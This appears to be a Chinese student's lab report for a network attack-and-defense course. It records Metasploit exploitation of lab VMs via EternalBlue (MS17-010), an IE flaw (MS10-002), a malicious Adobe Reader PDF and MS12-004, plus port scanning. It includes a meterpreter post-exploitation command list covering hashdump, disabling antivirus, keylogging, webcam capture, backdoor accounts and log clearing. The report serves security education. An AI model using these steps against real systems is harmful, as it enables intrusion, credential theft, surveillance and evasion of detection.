20212324 2023-2024-2 《网络与系统攻防技术》实验六实验报告

1.实验内容

1.1实验内容

  • 1.1一个主动攻击实践,尽量使用最新的类似漏洞:ms17_010永恒之蓝
  • 1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞:ms10_002
  • 1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞:adobe阅读器漏洞adobe_cooltype sing
  • 1.4 成功应用任何一个辅助模块:使用主机发现模块auxiliary/scanner/portscan/tcp进行扫描

2.实验过程

2.1一个主动攻击实践,尽量使用最新的类似漏洞:永恒之蓝

2.1.1 扫描
  • 攻击机:kali(172.20.10.4),靶机:WinServer2008 R2(172.20.10.5)
  • 根据前面实验,想到用nessus作探测工具进行主动攻击的信息搜集。
  • 建立一个名字为20212324Jinbo的扫描项目,设置好基本漏洞扫描模式和靶机(windowss2008)的ip地址,点击小箭头开始扫描,查看扫描结果。
  • 结果如下,看得出来可以利用的漏洞比较多,而且漏洞描述比较详细。我点开一个比较典型的漏洞准备主动攻击。

image-20240513091228240

  • 再通过nmap扫描一下,准备试试ms10_010这个漏洞(上网一查竟然就是大名鼎鼎的永恒之蓝!):
nmap -p -sV --version-all --script vuln 172.20.10.5

image-20240513091336723

2.1.2 准备靶机
  • 打开靶机,注意先进行安全配置,最基本的是关闭防火墙等

image-20240513085642170

2.1.3 攻击
  • 接下来正式开始通过kali攻击。
  • 输入命令:
search ms17-010

image-20240513091756123

  • 根据系统选择4-win server 2008 r2
use 4

image-20240513091826018

  • 根据模块需要的参数进行相关配置
show missing
set rhosts 172.20.10.5

在这里插入图片描述

  • exploit执行,发现攻击直接成功了,连参考的链接当中的下一步都不需要!

image-20240515182455795

2.1.4漏洞利用和后渗透

运行getuid,pwd,sysinfo,hashdump等测试shell的可用性,并尝试留下后门等后渗透工作

在meterpreter > 中我们可以使用以下的命令来实现对目标的操作:
sysinfo             #查看目标主机系统信息
run scraper         #查看目标主机详细信息
hashdump        #导出密码的哈希
load kiwi           #加载
ps                  #查看目标主机进程信息
pwd                 #查看目标当前目录(windows)
getlwd              #查看目标当前目录(Linux)
search -f *.jsp -d e:\                #搜索E盘中所有以.jsp为后缀的文件
download  e:\test.txt  /root          #将目标机的e:\test.txt文件下载到/root目录下
upload    /root/test.txt d:\test      #将/root/test.txt上传到目标机的 d:\test\ 目录下getpid              #查看当前Meterpreter Shell的进程
PIDmigrate 1384     #将当前Meterpreter Shell的进程迁移到PID为1384的进程上
idletime            #查看主机运行时间
getuid              #查看获取的当前权限
getsystem           #提权
run  killav         #关闭杀毒软件
screenshot          #截图
webcam_list         #查看目标主机的摄像头
webcam_snap         #拍照
webcam_stream       #开视频
execute  参数  -f 可执行文件   #执行可执行程序
run getgui -u hack -p 123    #创建hack用户,密码为123
run getgui -e                #开启远程桌面
keyscan_start                #开启键盘记录功能
keyscan_dump                 #显示捕捉到的键盘记录信息
keyscan_stop                 #停止键盘记录功能
uictl  disable  keyboard     #禁止目标使用键盘
uictl  enable   keyboard     #允许目标使用键盘
uictl  disable  mouse        #禁止目标使用鼠标
uictl  enable   mouse        #允许目标使用鼠标
load                         #使用扩展库
run				             #使用扩展库
clearev                       #清除日志

2.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞:ms10_002

2.2.1查找漏洞的模块并配置
  • 本实验我们使用ms10_002进行攻击

  • 攻击机:kali(172.20.10.4),靶机:WindowsXP(172.20.10.6)

  • 先查看nmap中存放漏洞的文件夹

image-20240515183256978

  • 可以看到,文件数量为105:

image-20240515183324069

  • 查找漏洞模块,找到对应模块后配置之

image-20240515183458287

image-20240515183513667

2.2.2修改靶机安全设置
  • 此处我们需要修改两处设置,一是关闭防火墙, 二是配置浏览器安全设置

    • 关闭防火墙image-20240515183911581
    • 修改ie安全中“标记为可安全执行脚本的ActiveX控件执行脚本”“允许运行或安装软件,即使签名无效”

    image-20240515184200551

    image-20240515184228584

2.2.3攻击
  • kali中在msfconsole当中exploit后,靶机链接控制台给出的网址,查看效果

image-20240515184621400

  • kali中回显发送数据包(建立会话)相关的信息,其中sessions可以看目前连接的会话,通过sessions -i x(x为对应标号)手动打开会话,即可成功进入靶机shell

image-20240515184615490

2.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞:adobe阅读器漏洞adobe_cooltype sing

  • 本次攻击使用的是针对adobe的攻击adobe_cooltype sing,该漏洞的工作原理为:Adobe Reader在处理CoolType字体文件对应的sing表时,存在栈溢出漏洞,从而能够实现代码的远程执行
2.3.1配置模块
  • 进入对应漏洞,并按照show missing, show options提示来配置参数

image-20240515185709452

  • 可以看到,生成pdf的如下:

image-20240515185730181

2.3.2开启监听
  • 接着kali通过multi/handler开启监听,等待靶机自己送上门来

image-20240515185851819

2.3.3攻击
  • 靶机打开pdf,攻击机即可获取到靶机的shell

image-20240515185946035

image-20240515190014277

2.4 成功应用任何一个辅助模块:端口扫描辅助模块ipidseq;以及

2.4.1使用ipidseq模块
  • 本次我选择的辅助模块是ipidseq端口扫描模块,有点和nmap类似

image-20240515190745239

image-20240515190751287

  • 配置如下,线程为我的学号24,超时3秒视为timeout

image-20240515190822687

  • 扫描结果如下

image-20240515190831416

2.4.2使用ms12_004漏洞实现调用计算器的攻击
  • 本次模块有点简单,也有点和nmap已有功能重复,故再利用一个漏洞玩点新的
  • 配置模块需要的参数

image-20240515191149579

  • exploit,看看靶机回连结果,成功!

image-20240515191238542

image-20240515191255414

3.问题及解决方案

  • 问题1:在进行浏览器攻击时,攻击机发送完数据包后靶机浏览器就死了,多次尝试一直不能成功

  • 问题1解决方案:参考IE浏览器报错的原因以及解决方法,估计是程序运行了非法操作,故不仅要修改安全中自定义级别的两项,而是要直接改成默认级别的“低”,从而解决了这个问题。故我猜测攻击中还有其他越权行为,让浏览器产生异常报错

  • 问题2:使用端口扫描模块时,爆出不能使用socket等的错误

image-20240515191503797

  • 问题2解决方案:socket等功能需要root权限才能调用,需要通过sudo msfconsole登录才能解决

4.学习感悟、思考等

通过本次实验,我深刻体会到实验中的每一个步骤都考验着漏洞及工具的使用者对网络安全漏洞的理解。

4.1. 实验内容的反思

4.1.1 主动攻击实践
  • 漏洞利用的敏感性:使用如“永恒之蓝”这样的漏洞进行攻击,我深深体会到漏洞的严重性。靶机什么都不知道的情况下,这种攻击如果发生在真实环境中,后果不堪设想。
  • 攻击的隐蔽性:在后渗透阶段,我学习了如何不留痕迹地进行操作,这让我能够从反向认识了攻击者可能采用的各种隐蔽手段。
4.1.2 浏览器攻击
  • 攻击的多样性:浏览器的安全漏洞更加严重,可以不分系统地被用于多台主机,浏览器安全任重道远。
4.1.3 客户端攻击
  • 软件更新的必要性:通过Adobe Reader的漏洞攻击,我认识到了及时更新软件,修补已知漏洞的重要性。
  • 攻击的隐蔽性和危害性:客户端攻击通常不易被察觉,一旦成功,攻击者可以获得极高的权限。

4.2. 实验过程的体会

  • 信息搜集的重要性:攻击之前肯定需要进行信息搜集,本实验中我使用Nessus进行漏洞扫描,能够事半功倍。

  • 攻击流程的复杂性:从查找漏洞模块到配置参数,再到实际的攻击执行,每一步都需要精确的操作和配置,否则没法成功。

  • 安全设置的影响:通过调整安全设置解决了浏览器攻击的问题,我认识到了适当降低安全设置可能带来的风险,但也理解了在实验环境中为了模拟攻击而必须做出的调整。

参考资料

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值